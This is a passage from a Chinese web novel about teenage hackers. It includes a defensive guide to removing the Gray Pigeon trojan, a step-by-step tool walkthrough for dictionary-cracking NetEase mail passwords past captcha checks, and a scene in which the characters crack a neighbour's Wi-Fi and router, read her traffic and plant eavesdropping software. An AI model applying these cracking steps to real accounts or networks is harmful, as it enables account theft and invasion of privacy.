
医院。

空调的风吹得危险漫步浑身无力,身体的刺痛让他逐渐清醒。他缓缓起身。自己的两个胳膊上裹着不同程度的绷带,动起来相当受阻,不过全身上下并无石膏,看起来因该都是皮外伤。

索性在躺一会儿好了。危险漫步身上软绵绵的,他躺下的瞬间,后脑勺传来一阵剧痛,接着一阵晕眩,危险漫步又睡死过去。

再次醒过来的时候,病房里有些噪杂,左边老先生的床位围了一圈亲戚。危险漫步向右看,萧让坐在病床上,手里拿着一本黑客攻防类工具书。

危险漫步叹了口气,萧让向这边望了望,但是没有说话。

“熊猫烧香本身没有什么大大技术含量,它名声大噪,是时代造就它,而非它影响时代。好比在法律未出现前,你拿把刀去大街上砍人。你或许可以砍死一百个,放在今天绝对是震惊全国的大案,可是,你利用的不过是没人管制,接着做大家都能做,但是没人做的事。简单粗暴。

“至于你的朋友,我感到抱歉。你在逃避,他要么遇到不测,要么放弃玩笑的账号,像两条伤狗互舔伤口一样的时光,偶尔怀念就好,堕落其中不仅肉麻,而且显得你生活糟糕。你应摆脱困境,而非沦陷在伤口被舔得很爽的快感中。把那个玩笑当做游远的老友,应该蛮好的。

“黑客是什么我已经说了,你有计算机方面的兴趣,我可以告诉你我会的我知道的。如果只为了莫情其妙的仇恨,复仇,那么我就劝你放弃。爱一个人久了可以成为习惯,恨一个人却需要不断地鞭策自己,很累的。

“至于我怎么做,与你无关。校规规定不许迟到,不许旷课,不许打架等等,我,天天违反。不但如此,我还入侵里学校的官网,贴上校长和他情妇的照片。对学校来说,这有些大逆不道了,虽然大家都懂校长和英语老师的事,但这毕竟是‘秘密’,我如此堂而皇之,是否无趣?

“可是,校规没写禁止杀人越货。我也没做过,这就够了,不是么?”

萧让的书合上,又翻开。他嗯了一声,只表示听到。

危险漫步从床上下来,萧让的书再次合上。

“医生说,你有轻微脑震荡,需要多休息。”

“……”

“昨天晚上一个住在公寓的老师回家的时候,发现我们躺在雨地里,就把我们送到了医院。休假的事他会和学校沟通,这些你不用担心。”

危险漫步披上外套,缓缓走到窗前。鳞次栉比的楼房,午后阳光撒于其上。远处的大海依稀能见,一条长堤横于其上。开阔的视野,总是能放松心理压抑的情绪,饥饿感随之而来。

危险漫步和萧让一个星期后才出院,如果不是医生撵他们,他们恐怕还要再住上一段时间。

住院期间,危险漫步拿着笔记本,整日钻研着灰鸽子。

对于黑客来说,应该没有不知道灰鸽子的了。的确,灰鸽子带来的影响是巨大的,可以说80%的木马或者病毒都钟情于灰鸽子,依据何在?灰鸽子在网上的广泛流传,针对他的免杀技术也是相当成熟,有时候经常可以在黑客站点找到有关灰鸽子的免杀动画。其实大家耳熟能详的“变种”这两个字,他人修改过的木马病毒等。灰鸽子的变种数量是非常的多,利用了许多技术手段来逃避杀毒软件,所以单靠杀毒软件来对付灰鸽子,还是有些勉为其难了,并且灰鸽子在很早的版本中就开发了远程开启代理功能,而且这正好给那些利用别人的钱财在互联网星空进行消费的“黑客”带来了便利。甚至于现在有许多人戏称灰鸽子为刷点专用工具。

先简单介绍一下灰鸽子的运行原理。现在的木马一般是利用客户端来生成服务端,这样做有利于自定义木马的名称和实现反弹连接。灰鸽子服务端也是如此,假如自定义服务端名称为netserver.exe,只要执行这个程序就会生成在系统目录,释放出netserver.dll和,netserver_hook.dll到该目录下,如果配置过程中第一记录键盘,那么同时会释放出netserve.dll这个文件用来记录键盘操作。netserver.exe运行后,会把自己注册为系统,服务早期的windows98,windows me系统则由于没有系统服务而会写入注册表启动项目。

那么,为什么杀毒软件查杀出了病毒而在目录下却找不到?其实netserver_hook.dll通过拦截API调用来隐藏病毒。这样就增加咯自身隐蔽性,灰鸽子利用了当今流行的进程插入技术,所以用任务管理器也找不到它的行踪。

接下来要隆重介绍一款工具,冰刃。冰刃是一个检测系统信息的好手,还可以显示系统隐藏进程。危险漫步根本就没开启IE,甚至从来都不用这款系统自带的浏览器,却在进程信息中发现它的存在,这足以说明他的系统中中了木马了。下面再利用一款工具确认一下,也是灰鸽子工作室出的一款安全工具:木马辅助查找器。

利用启动项目管理下的系统服务管理可以清楚看到,系统出现了一个不正常的服务:netserver。对这样不正常的服务项目,基本可以确定说木马建立的。其实利用这款工具的删除服务功能,可以将这个服务彻底删除,那样灰鸽子失去了启动支持,也就不会随机运行了。可是木马产生的文件却还在“体内”,接下来的事情就是手动干掉它了。

前面已经说过,在正常模式下是看不到灰鸽子文件的,但是在安全模式下它是跑不掉的。开机后按F8调出启动菜单,就可以进入安全模式下执行操作,由于木马一定会在系统目录下生成,**_hook.dll,查找出这个文件,就可以将他的同伙一网打尽了。

利用windows搜索功能,定义在windows的安装目录。这里c盘是系统盘,文件名称输入“_hook.dll”后就可以查找出灰鸽子生成的文件,假如这里是netserver_hook.dll,那在该目录下一定存在netserver.exe和netserver.dll这个键盘记录文件只要删除这几个文件,并删除启动服务的项目,上面说过了,用木马辅助查找器可以删除这个服务,也可以手工删除。

搜索出来,灰鸽子名为:netserver.exe,那么只搜索“netserver”,把查找出来的键值彻底删除就可以了,在没有启动服务的系统中,灰鸽子靠注册表run键值来启动。运行注册表编辑器也可以把“netserver.exe”删除。

这次的清除行动让危险漫步获得了不少的经验。

灰鸽子曾遭到金山公司以及其他集体的围剿,口诛笔伐法律诉讼,所以灰鸽子工作室不得不宣布停止开发。不过,在没有澄清事实的同时,灰鸽子的作者也发布了一个专用的清除工具,以帮助无辜用户清除电脑中的灰鸽子。但对危险漫步来说,灰鸽子停止开发,并不算一个特别好的消息。他当然不愿自己的电脑里中灰鸽子,但是要失去一个研究对象,的确是件很遗憾的事情。

“灰鸽子服务端卸载程序”是由灰鸽子工作室开发的一款灰鸽子木马卸载程序,因为是官方开发的,所以其查杀效果自然不必多说。灰鸽子服务端卸载程序,适用各版本的灰鸽子木马,支持诸多版本的服务端程序的检测和卸载。

虽然是卸载程序,但是危险漫步发现在下载灰鸽子服务端卸载程序时,杀毒软件也会报警。估计应该是在卸载程序中包含一些检测病毒样本之类的。运行灰鸽子服务端卸载程序后,可以看见程序完全是vista风格的很漂亮。

点击界面中的开始检测按钮,就可以开始检测系统中是否中了灰鸽子,检测到系统中有灰鸽子服务端和进程时,就会自动结束进程,并且删除服务端进行清除。清除完毕后会提示需要重启系统。

其实官方的灰鸽子清除工具对付常用的灰鸽子服务端当然是很好用的,不过灰鸽子的流传实在是太广了,各种灰鸽子变种也是层出不穷,有的灰鸽子变种,就算使用官方的清除工具也可能无法检测清除。这个时候只能使用手工的方法进行清除。

灰鸽子服务端程序默认名字为“g_server.exe”,“g_server.exe”运行后会在windows目录下释放“g_server.dll”和“g_server_hook.dll”文件。有些灰鸽子会多释放出一个名为“g_serverkey.dll”的文件用来记录键盘操作。“g_server.exe”文件将自己注册成服务,以启动“g_server.dll”和“g_server_hook.dll”。“g_server.dll”文件实现后门与控制端客户端进行通信,g_server_hook.dll主要通过拦截api调用来隐藏木马文件。因此,中了灰鸽子木马后,找不到病毒文件,也看不到病毒注册的服务项。而且由于灰鸽子服务端文件的设置不同,“g_server_hook.dll”有可能注入到“explorer.exe”进程,但也可能是其他系统进程。

另外,木马服务端程序文件名“g_server.exe”并不是固定的,而是可以自定义设置的,例如服务端文件名为“a.exe”时,生成的几个木马文件相应的就是“a.exe”,“a.dll”和“a_hook.dll”。

由于灰鸽子拦截了api调用,所以在正常模式下,服务端程序文件和它注册的服务项均被隐藏,此外,灰鸽子服务端的文件名也是可以自定义的,给手工检测带来了一定的困难。但是因为灰鸽子的检测仍然是有规律的:无论服务端文件名是什么,一般都会在操作系统目录下生成一个以“_hook.dll”结尾的文件。

当然,各种变种灰鸽子也可能会对dll文件进行改名。危险漫步习惯使用syscheck检测各种灰鸽子或其他木马的。

syscheck与冰刃一样,同样都是国产安全工具,它集合了冰刃与另一款安全软件sreng的优点,具有强大的系统分析检测功能,可以轻松地检测出木马并进行系统恢复,而且能够有效的清除rootkit木马病毒。syscheck的强大分析检测功能,是源于syscheck采用了特殊的技术获取系统底层控制权,因此一些杀毒软件,比如说drweb之类的,可能会发生报警提示,不过这是误报。

运行syscheck,点击界面中的进程管理按钮,显示当前进程中的所有进程,在进程列表中可以清楚的看到可疑的进程。

syscheck采用三种颜色区分进程:其中黑色的显示是正常的系统进程,这类进程是绝对安全的,所以说不用管它们;红色的进程是第三方进程,里面有可能显示了隐藏的木马进程,尤其需要好好地识别。紫色显示的也是系统进程,但是这些进程中有第三方的程序加载了dll文件或其它驱动,其中很可能就有木马与病毒做了手脚。选择要检查的进程,勾选下方的模块简洁显示项后,syscheck会启动过滤隐藏正常的系统dll模块文件,只以红色显示第三方模块dll文件,因此可以很轻松地揪出隐藏的dll木马文件。

比如说在危险漫步的系统中,alg.exe,lassas.exe,svchost.exe,csrss.exe等多个进程显示为紫色,点击进程后,在其中都发现了一个名为“g_server_hook.dll”的模块文件。很显然,这就是灰鸽子木马做了手脚了。

找到灰鸽子木马的进程及文件后,可以重启系统进入安全模式,打开注册表编辑器,利用搜索功能,在“查找目标”输入刚才搜索出来的木马服务端文件名,确定后就可以找到灰鸽子的服务项,然后将其删除就可以了。另外,在安全模式下删除刚才搜索出来的windows目录下的相应的exe文件和dll文件,然后再重新启动计算机,灰鸽子服务端就已经被彻底清除干净了。

但是在有些情况下灰鸽子加载的很隐蔽,可能无法直接找到相应的服务项目和文件进行删除,这时可以利用syscheck工具进行清除。在syscheck的进程管理中,直接点击快速净化按钮,自动清除进程中的可疑项目,并会修复系统中的第三方加载模块,进行全面的进化。对系统进行清理,可以方便于运行其他相关安全工具或执行灰鸽子木马的服务与文件删除。

另外,灰鸽子可能会对注册表项目进行隐藏,无法直接查找到相应的服务项目,这个时候就可以利用syscheck的服务管理功能查杀清除。点击syscheck界面中的服务管理按钮,查看当前系统中安装的所有服务。点击仅显示非微软项,可以过滤掉所有系统服务,只以红色显示第三方服务及其厂商标识信息等。通过右键菜单,可以查看服务对应文件的版本信息,从而辨别出是否为木马服务。右键点击该服务,选择中止或禁用服务,选择“仅删除服务键值”的话,就可以删除服务在注册表中的键值,选择“删除服务及文件”命令的话,可以彻底的删除木马服务及其对应的文件。

隐藏的灰鸽子木马文件,可以用syscheck的文件浏览页面内置的资源管理器查看,在这里可以看到通过rootkit技术隐藏的木马文件或文件夹。在右键菜单可直接进行删除操作外,还可以选择“延时删除(重启后生效)”,这样就再也不用担心无法删除顽固的木马文件了。

出院后,危险漫步搬到了萧让租住的大套间,楼下他起先租住的地方,作为工作使用。

其实也没有什么了不起的工作,只是每天的学习生活太过乏味,总得找些事作为消遣。消遣之前,危险漫步要先见一个老朋友。

至于危险漫步和萧让为什么能摒弃前嫌重修盟好——

下午的钟声越过飞鸟,传到医院。懒洋洋的人们互相对视一眼,也许就在这一瞬间,决定了是冰释前嫌,还是风流云散。


第十一章  黑客(二)


林雨生的电脑忽然弹出了一个文件。林雨生一愣,最先反应是电脑中毒了。该文件关不掉,30秒后,自动预览。这是一个PDF格式,介绍黑客的文章,看到署名是危险漫步,林雨生悬着的心才放了下来。

黑客在中国最早因该叫“窃客”,名词出现在约1995年。那时候,计算机在中国还处朦胧阶段,黑客同样也处芽期。

1997年,电信实行优惠上网,之后,网络才算是真正普及到寻常百姓家。

互联网这一新名词逐渐被大家接受,这两年来,真正意义上的发展与飞跃在于人们的内心:思想。文艺复兴的核心思想是人文主义,其核心是《人乃万物之本》。

不过那两年思想并不如文艺复兴般明确,它像一团似是而非似有还无的雾气,人们能感受到它的生长,它的生命力,但是感受不到他的具体意义,具体的未来。所谓思想观念,都还是雏形罢了。

1998。中国初代黑客崭露头角,黑客这一行业在中国出现了真正意义上的分水岭。该文还列举了几个具体人名,以及他们自己制作的小工具。虽然那些工具在今天看来多半都很傻瓜,甚至非主流,但是那毕竟是很多脚本小子的“初恋”,中国后来相当一部分黑客都很怀念它们。顺便一说,那时候中国还没有脚本小子的概念。

1999,红客诞生。

新世纪,网络发展的轨迹又出现了变化,原因很简单:网吧井喷而出。蜂拥出现的网吧使网民急剧增多,黑客这一行业变得鱼龙混杂。众多黑客工具的出现,使会一些电脑技术的人便可以利用黑客工具大肆虐杀网络。追求极致卓越技术的黑客越来越少,好逸恶劳喜用工具的人越来越多,他们自称黑客,其实不过是幼稚的脚本小子。这些人的群体更为复杂,有新接触计算机的孩子,也有对计算机半知半解的抠脚大叔。还有些花枝招展的艳美女郎,熟练几款黑客工具后,就在网络上以女侠自称。

这是最好的时代,这是最坏的时代。新的世纪,更多的人接触到了计算机,却也使这个队伍鱼龙混杂。

2001,中国黑客与美国黑客又有了一次交手,和先前一样,小打小闹罢了。不过这次的交手经过媒体的渲染,输赢已变的不重要,因为,它已沦为一场爱国秀。做秀非本意,但在今天看来,却是别有一番滋味的。

2002之后,硬性限制基本解除,网吧继续强势上线——为了逼格我们应该称之为网咖。网民后浪推前浪,黑客的发展呈现稳定趋势。值得一提的是2006年底2007年初的熊猫烧香,他是中国计算机发展以来,范围最广、破坏力最强、影响最大的病毒。然而此病毒本身并无高端的地方,硬说的话,就是暴力,很暴力。熊猫烧香捅破了中国网络安全那一层说不清道不明的暧昧关系,与其一直受到病毒的伤害,一次大伤后变得顽强未必不是好事。

易中天先生认为中国法律和美国法律在立法上有一很大不同,美国人立法,先把公民想成一个坏人,然后定各种各样的的法律,限制坏人的行动,最后坏人发现行坏的路径都被堵死了,沿着可行的道路走,一路到头,合法公民。

中国人由于自古的文化不同,所以在立法上,把公民想成一个好人。接着法律的条文告诉公民哪些事不能做。因为我们都是君子,所以立法前,想着的都是好人。

两种立法的结果是,中国的法律出现了各种各样暧昧的漏洞,这些暧昧的漏洞,法律难以制裁,便以“道德”来约束。有道德的人被约束住,无道德者,却有机可乘。所谓好汉怕赖汉,赖汉怕歪死缠,就是因为如此。

在中国,无赖谚语众多。光脚的不怕穿鞋的,之中其实也包含了无赖心里。

网络世界亦是如此,熊猫烧香就是这样的一个无赖,它做到了大家都知道,却不去做的事。

君子动口不动手,打输的住院,打赢的坐牢。

今天,计算机的发展因该算是有模有样,脚本小子的时代(如果他们有时代的话)已经过去,技术黑客高高在上,云里雾里寻常人家很难见到,网络安全问题不似以前般,一塌糊涂,没技术的人靠安全软件,做到风雨不进,足以。

网络入侵类很少再在私人网络里发生,毕竟这个时代已经不再流行逞能。安全问题更多出现在公司间发生,入侵官网的挑衅,信息引发的商战,最终演变成计算机战争。

我们全都在直奔天堂,我们全都在直奔相反的方向。简而言之,那时跟现在非常相象。狄老的金句似乎适用于任何一个时代。

如果按照黑客的成熟度划分的话,中国的黑客大致可以划分为三个阶段。

一。世纪末为一个年代,这个年代是青涩的,是不成熟的,却是最好的。此时中国的处于刚起步阶段,一些热爱新兴技术的青年受到国外黑客技术的影响,开始研究安全漏洞。青涩时代的黑客们大多是由于个人爱好而走上这条路的。好奇心和求知欲是驱使他们前进的动力,没有任何利益瓜葛。这个时代的中国黑客们通过互联网,看到了世界,他们崇尚分享、自由、免费的互联网精神,并热衷于分享自己的最新研究成果。

这一时期的代表人物是小榕,他以两款黑客工具最为被世人知晓:流光和溯雪。

流光是一个绝好的ftp、pop3解密工具,漏洞扫描也是众多扫描其中最具特色的一个,除了提供全面的扫描功能以外,利用C/S结构设计的扫描思想更是在众多复杂的应用场合脱颖而出。

溯雪是利用asp、cgi对免费信箱、论坛、聊天室进行密码探测的软件。密码探测主要是通过猜测生日的方法来实现,成功率可达60%-70%。溯雪的运行原理是通过提取asp、cgi页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码。由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间。

一日,危险漫步在黑客论坛里无意间发现了溯雪的最新版本,好奇之余,危险漫步拿过来试了一试。

首先从网上下载最新版的“溯雪”的安装包,解压后运行安装文件夹中的程序,安装完成后就可以看到“溯雪”的庐山真面目了。总的来说,“溯雪”的操作界面和以前的老版本差不多,这样也好,操作起来会更容易上手。

危险漫步以网易163的VIP邮箱来进行测试,首先在“溯雪”的“地址”栏中填写网易的网址,打开网站后点击网页中的“免费邮箱”链接,就可以看到网易邮箱的登录界面了。在左侧操作区域的“单击导人相应的表单元素”中,点击鼠标右键并选择菜单中的“导入表单”命令,这时“溯雪”就会自动提取网页中的表单信息,提取完成后我们选择其中的Loginvip这个选项。

需要注意的是,提取出来的表单元素并不是固定的,每个网站的表单名称都会有所不同。

这样在表单提取区域的下方,就可以分析出表单中的各项元素,其中的username和password就是我们破解的重点,因为这两项分别代表着用户名和密码信息。双击打开列表中的username项,在弹出的“编辑表单元素”窗口中,选中“使用字典”并在下拉列表中选择Name.Dic这个字典文件,同样双击打开列表中的password项,在弹出的窗口中选择password.Dic这个字典文件。

接下来选择溯雪“运行”菜单中的“开始”命令,这时会弹出一个“选择标记”的窗口,在其中可以看到一个错误提示的语句内容,比如这里的错误特征码为“请检查用户名和密码的输入是否正确!”。同样需要注意的是,每个网站的错误特征码也是不尽相同的。将这个错误提示信息复制到剪贴板,然后选中“按以上条件选择标记最多3个”,最后再将刚才复制的错误信息粘贴到下面的输入框中。所有的设置完成后关闭这个窗口,这时“溯雪”就会自动进行探测扫描了。

由于“溯雪”的探测扫描使用了多线程,所以很快就可以从软件的提示栏中看到破解的密码个数了,选择窗口中的“探测结果”,就可以查看破解出来的帐号和密码信息了。利用破解出来的邮箱帐户和密码信息,可以非常方便的登录对方的网易邮箱。

有的网站在登录的时候,会要求用户进行其它信息的验证,比如Cookie信息或图片信息等,遇到这种需要进行信息验证的网站,其实也可以用溯雪来破解的。

登录某个网站的时候,如果旁边出现了Cookie验证码输入框,那在提取表单元素的时候,往往就会看到一个和验证码相关的元素信息,比如危险漫步测试的这个网站,表单元素chkcode这项对应的就是这个验证码信息。至于用户名和密码的选项设置,都和前面介绍过的无需验证的网页破解一模一样,然后双击打开列表中的chkcode这项,在弹出的窗口中选中“提交到”并在下拉列表中选择“Cookie[Item]”就行了。

在“溯雪”界面的左下角,就可以看到一个名为“Cookie信息”的区域,从中找到Cookie值对应的参数名称。首先在网页中看到验证码为3191,然后在“Cookie信息”窗口中找到3191,在它前面对应的就是验证码参数“Fchkeode”,将这个参数信息复制到剪贴板中。接下来点击溯雪“运行”菜单中的“开始”命令,这时会弹出一个“Cookie[ltem]”的提示窗口,将刚才复制到剪贴板中的信息粘贴到窗口中,最后再输入错误特征码,就可以进行破解操作了。

如果登录窗口出现的是图片验证码,那么又该如何进行操作呢?同样是在提取表单元素的时候,可以看到名为rand的元素,它对应的就是验证码。双击打开列表中的这个表单选项,在弹出的窗口中选中“提交到”并在下拉列表中选择“验证码”。接下来在网页验证码的图标上点击鼠标右键,在弹出的属性窗口就可以看到图片的链接属性了,在“选择验证码图片链接”栏中,填写验证码图片的相关链接,在下面的“验证码信息”中选择列表中的第二个选项后,点击“读取测试”按钮就可以验证获取的验证信息是否和图片信息一样了。最后点击溯雪“运行”菜单中的“开始”命令,在弹出的窗口设置错误特征码后,程序就可以进行相应的破解操作了。

中国黑客经历的第二个时代是辉煌的金色时代。以中美黑客大战为标志,在这个历史背景下,黑客圈所宣扬的黑客文化以及黑客技术的独特魅力吸引了无数的青少年走上黑客之路。自此事件之后,各种黑客组织如雨后的春笋般冒出。此阶段的中国黑客,普遍的特点是年轻,有活力,充满激情,但是同时在技术上还缺乏成熟。此时期的黑客圈子里贩卖漏洞、恶意软件的现象开始升温,同时,因为黑客群体的良莠不齐,以盈利为目的的攻击行为逐渐增多,黑色产业链逐渐成型,因此产生了第三个时代也是最后一个时代——黑色时代。

这个时代讲究弱肉强食,优胜劣汰,很多黑客组织就此解散,上古级黑客很多都去了安全部门安家置业。一切以利益为先,门户型的漏洞披露站点也不再公布任何漏洞相关的技术细节。

 文本底页,危险漫步向林雨生发出邀请函。


第十二章  林雨生(三)


汽车呼啸而过,尘土飞扬。身后的站台上已经积了一层厚厚的灰,大概有些日子无人打扫了。站台正对着一个矮山坡改建的公园,很多年前,公园有一个人工湖,茶店,烧烤摊等设施。后来公园进行一次改造,便只剩树了。

公园与大陆有一条排水沟相隔,排水沟的两边护栏皆有半米高,有几个孩子在护栏上摇摇晃晃地行走。

左手边偌大的涵洞,涵洞后的城市隐约可见。

右手边,公路,林木,海洋。

林雨生从未来过古店,古店在这个南北走向狭长的城市的最南陲,林雨生坐了足足四个小时的大巴才抵达这里。他在站台上伫立一会儿,车内肮脏的气息逐渐消失。他左右看看,走往涵洞。

一路无话,生活按部就班。林雨生这个重点高中的优等生突然转学到普通的学校,引起了不小的轰动,同学老师的问题千篇一律,他难以回答清楚,只好以沉默待之。成绩好又高冷,是学生时代受欢迎的男生的一种,林雨生长了一张颇为白净斯文的脸,很快就受到了不少女生的青睐。

可惜,林雨生偏偏是个不善交际的人,他默默一个人做事会很出色,若是人声嘈杂,再有人挑三拣四,受到打扰的他便会效率倍减。冷淡的态度又引起了不少女生的反感,这个转学生更加莫名奇妙起来。

危险漫步想攻克一家博彩网站,但是凭他和萧让两个人是绝对不够的,危险漫步又不愿过早让汪青蓝加入,想来想去,只好让林雨生过来了。

危险漫步没想到的是,林雨生来之后,他并没有大张旗鼓地去攻击博彩网站,反而和邻居的路由器作了一次“心灵沟通”。

原来,不知是审美差异还是人性中的犯贱心理,对林雨生示好的几个女生中,林雨生皆觉得“无感”,反而是对面高冷的小姐姐,让林雨生异常得感兴趣。

据说,他有次出门刚好看见她,她穿一件很宽松的睡衣,手里拎着垃圾,林雨生说反正他要下去,顺便帮扔一下。

小姐姐轻轻摇头,走下楼去,林雨生站在那里,略略有些尴尬。

“他真的很高冷,之前之后遇到,有时我也会打招呼,但她总是——总是拒我于千里之外,我原想向她要联系方式,但是,但是实在不好意思开口。”

萧让和危险漫步对视一眼,哈哈大笑。危险漫步原想拒绝这个庸俗、低俗、媚俗的要求,但是又想林雨生千里迢迢过来帮自己,对他的第一个要求(而且是人生大事)就拒绝,不太好。一番思想斗争之后,危险漫步对林雨生说:“你对黑客还没有什么,根本上的认识,见识更是没有。我本想和你一起进攻博彩网站,你的第一次黑客经历也会有意义,你边行动边见识,会成长很快。但是执意要求,我也没有办法了。过程我操作,你看一下。”

危险漫步生无可恋地打开电脑,既然林雨生的目的是联系方式,那么用路由器进入是最好的方法。

打开wifi后搜索附近的信号,这栋公寓的入住率相当高,瞬间跳出了十多个wifi信号,如果一个一个试不知要试到猴年马月。

危险漫步打开ASK2,测出各个信号点的距离,锁定一个叫TY520的信号,看见这个信号,林雨生的心顿时凉了一半。萧让又忍不住笑了起来,危险漫步说:“这个软件是我自己做的,呃,工具吧,叫工具好一点。它的功能就是测出wifi信号或者IP的距离。”见林雨生一脸的失望,危险漫步继续道:“千万不要对黑客工具抱有过分的希望,它是辅助,不是依赖,你指望一个黑客工具,可以任意操纵任何人的电脑,这不可能。”

第二步是破解密码。WPA2加密只能用暴力破解,现在市面上破解wifi密码软件众多,但基本都没什么用,正在破解的小圈子绕了俩小时手机绕没电了都没把密码破出来。

危险漫步选择的是minidwep,这款工具相对强大。点击爆破之后,唯一能做的就是等待了。

危险漫步告诉林雨生,wifi加密方式除了WPA2还有WEP,相比较而言,WPA2从时间上说,爆破速度要慢一些,而且,破解WPA2只能用暴力破解,所以现在很多人更愿意路由器密码用WPA2加密方式。

萧让打开极限狂飙,飙了两把车,危险漫步倚在沙发上,闭目养神。林雨生则紧张地看着电脑屏幕,看着屏幕上不认识的字符。

萧让连续通杀三把,他转头望望危险漫步的电脑,“我记得那个女生,她的确很漂亮,但却是个地地道道的冷美人。不过,她连你是谁都不知道,你就跑过去加她好友,这样好么?你想,你加她,她问你是谁,你说是你邻居,她说你哪来的我号?你改怎么说呢?哦,我入侵了你的路由器,得来的。”

林雨生白了萧让一眼,并不理睬她。他再看向电脑时,屏幕上已出现了一行数字:960726.520

960726应该是生日,520就无须再多说了。看到这里,林雨生凉了一半的心又凉了一遍。

危险漫步萧让略显尴尬,萧让说我跑车了,便又回过头,继续玩他的游戏,危险漫步犹豫要不要继续,但是良久没见林雨生喊停,便继续操作。

连接小姐姐的路由器,接着连接WEB管理界面,因为进入WEB管理界面后可以篡改DNS等等各种功能,如果不是这样,也不必破解其wifi密码。

WEB管理界面又要密码。继续暴力。破解后查看有几个账户登陆,运气不错,小姐姐刚好在线。

除了自己,另外又有三个设备,两个安卓,一个PC。危险漫步就此打住,询问林雨生,是要社交软件的账号,还是监视她。

萧让的头转了回来:“我更倾向于前者,后者太猥琐了。监视,奸视,想想都觉得肉麻。”

危险漫步不语,帮人帮到底,送佛送到西,攻击私人路由器这种下流手段都做了,再加一项偷窥也无可厚非。

林雨生不语,沉默一会儿,突然跑下楼去,身影消失在门后的漆黑中,只留下一句等我。

林雨生很快回来,上气不接下气,与出门前不同,他的手里此时拎着一大袋饺子。

“我觉得太猥琐了。别说监视,就是用这种方式窃取账号也太猥琐了。管她对我作何感觉,我想和她说话,想要她社交软件的账号,都应该自己要才是。”

危险漫步:“那你买饺子,是要下饺子给她送过去么?”

林雨生点头,危险漫步双手痛苦地捂住脸,饶了我吧。萧让探出脑袋,笑着说:“那个,不好意思,林雨生同学,如果你打算现在就下饺子送过去的话,你还得买上一口锅。因为我们这里只有一个电磁炉,没有锅……”

林雨生一脸无辜,他暗骂了一句,再次飞奔下楼。回来的时候,危险漫步电脑还显示刚刚的界面。危险漫步:“萧让建议我,建议你可以在她的计算器里留下些——留下些足迹吧,累死于小狗撒尿画圈站领地。”

萧让大声反驳:“建议的确是我出的,不过这种做法是你最喜欢干的吧?人疯起来,真实自己都骂。”

危险漫步不语,林雨生把饺子下锅里,问危险漫步她玩不玩微博。十七秒后,危险漫步说,玩。根据流量日志看,是个微博控。不过,频率更高的是……王者荣耀。而且,经过我的计算,一周内,她平均每天在家玩王者荣耀的时间……超过四小时。”

萧让又冒了出来:“有没有搞错啊,玩王者荣耀的女生会有男朋友的么?况且,四个小时了耶,已经超过我极限狂飙的在线时长了,我以为我已经够咸鱼了,没想到……”

林雨生:“咸鱼,能不能老实地飙你的车?”

萧让一推桌子,嬉笑怒骂:“我说的是好话哎,要不我说她有男朋友,卿卿我我恩恩爱爱刺激你?对了那个TY和960726到底是谁啊——”

“闭嘴!”林雨生拿锅盖的手明显地抖动了一下。危险漫步仰着头望危险漫步,忽然想到了什么似的,“对了雨生,你——买碗了么?”

林雨生满脸生无可恋,等他拿着一只碗上来的时候,萧让愣住了,“你拿一只碗,要饭呐?我们也要吃啊。”

林雨生把饺子装进碗里,没好气地说要吃自己买。他端着饺子,颤颤巍巍地走向对面。门铃响了很久,就是不见人开门。悲伤的是,里面放着的音乐隐约可以听见。

走了一趟那绚烂华丽背后的虚假

绕了一圈那短暂快感之后的空荡

享那些愉悦 得那些忧伤

重复着 弹奏 激情的狂想

……

林雨生此刻,悲伤极了。他端着饺子,进退不得。时属晚春,饺子还有温度,但是上升的热气很快就消失不见了。正当林雨生准备返回的时候,门开了。

女孩手里拿着手机,用一只手把门打开。她外面套着一件宽松的白色卫衣,米色的休闲裤看起来似乎有些肥大。

她狐疑地顶着林雨生,又重新敲点手机,不过很快,她又抬起头,显得有些恼怒的样子。

“都怪你,死了。”女孩没头没脑地说。林雨生茫然地盯着她,这次,女孩终于说了句林雨生能听懂的话:“怎么了?”

林雨生说,他和朋友包了饺子,觉得味道不错,就拿些来给她尝尝。

女孩狐疑地说:“饺子?朋友?”

“……”

林雨生不知该说什么,她总是一句隔着一局的,说些没头没脑的话。半响,女孩似乎从梦里醒了,“可是我记得,你们是三个男生合租的吧?”林雨生点头,女孩继续:“你和你的朋友,指的就是你那两个室友么?”

林雨生点头。

“怪有情调的。”女孩说完,看林雨生的眼神都变得不一样了。

林雨生发现了一些端倪,说和他们两个是校友,只是关系很好的朋友而已。

越描越黑。

另一边。萧让危险漫步二人凑在音响边,窃听林雨生和她的聊天。趁林雨生来回下楼的功夫,危险漫步已经在林雨生的手机里植入里窃听软件。

萧让问危险漫步,你不是一直反对做这种下流事情的么?今天怎么破戒了。

危险漫步挥手,说,为了八卦,为了八卦。

当两人听到女孩说“怪有情调”的时候,两人似乎触电了一半,飞快地弹开,萧让大叫:“共享,共享,我不想和你凑一起窃听。”

危险漫步:“一边去,自己弄,别蹭我这边的音响!”

这一边。林雨生转移话题,话题又回到了饺子。“趁热吃吧,饺子凉了就不好吃了。”

女孩推辞,说吃饱了。若在往常,林雨生一定就会告退,但是他今天很执着,仿佛女孩吃了饺子就会答应似的。 

女孩非常难为情地把饺子接下,打量一会儿,突然说,可是,这是速冻饺子呀。

尴尬。无比尴尬。

女孩笑眯眯地望着林雨生,林雨生硬着头皮说,其实只是想和她说说话。

“真冷啊,是吧阿让。”

林雨生一愣,自己的房门被打开,危险漫步从里面走了出来,意味深长地看了林雨生一眼。萧让从屋里想跟着出来,他看起来有些紧张,表情不似危险漫步般轻松,他下了两级台阶后,又回身进屋,语调有些奇怪:“我进屋拿件外套吧,外面的确有些冷。”

危险漫步闻声,微微一笑。林雨生的勇气再也没能坚持,他对女孩说,那——我先回去了。

他匆匆转身,女孩把他叫住,问道:“你也喜欢,《飞鸟与鱼》这首诗么?”

林雨生震住了,他以奇怪的姿势停在那里,一动不动。危险漫步在楼层里,黑暗遮住了他惊讶的神色。

手里拎着外套的萧让同样被定在门边,一动不动。

最先反应过来的是林雨生,因为他必须反应过来。他用他毕生的勇敢,问了句蠢话。有时候,蠢话在适合的时候也很有作用。

“还可以吧。”林雨生说,“我叫林雨生,你呢?”

他转身看女孩,女孩嫣然一笑,似乎并不生气。

“田依,TY是我,960726也是我的生日,所以,你们不必多想,计算机boy。”

“哦,好。”林雨生点头,“我的生日是,4月29日。”

萧让从屋里出来,拉着林雨生的衣服,“走吧。”

危险漫步落寞地下楼,三人逃似的离开公寓。 


第十三章   大森林


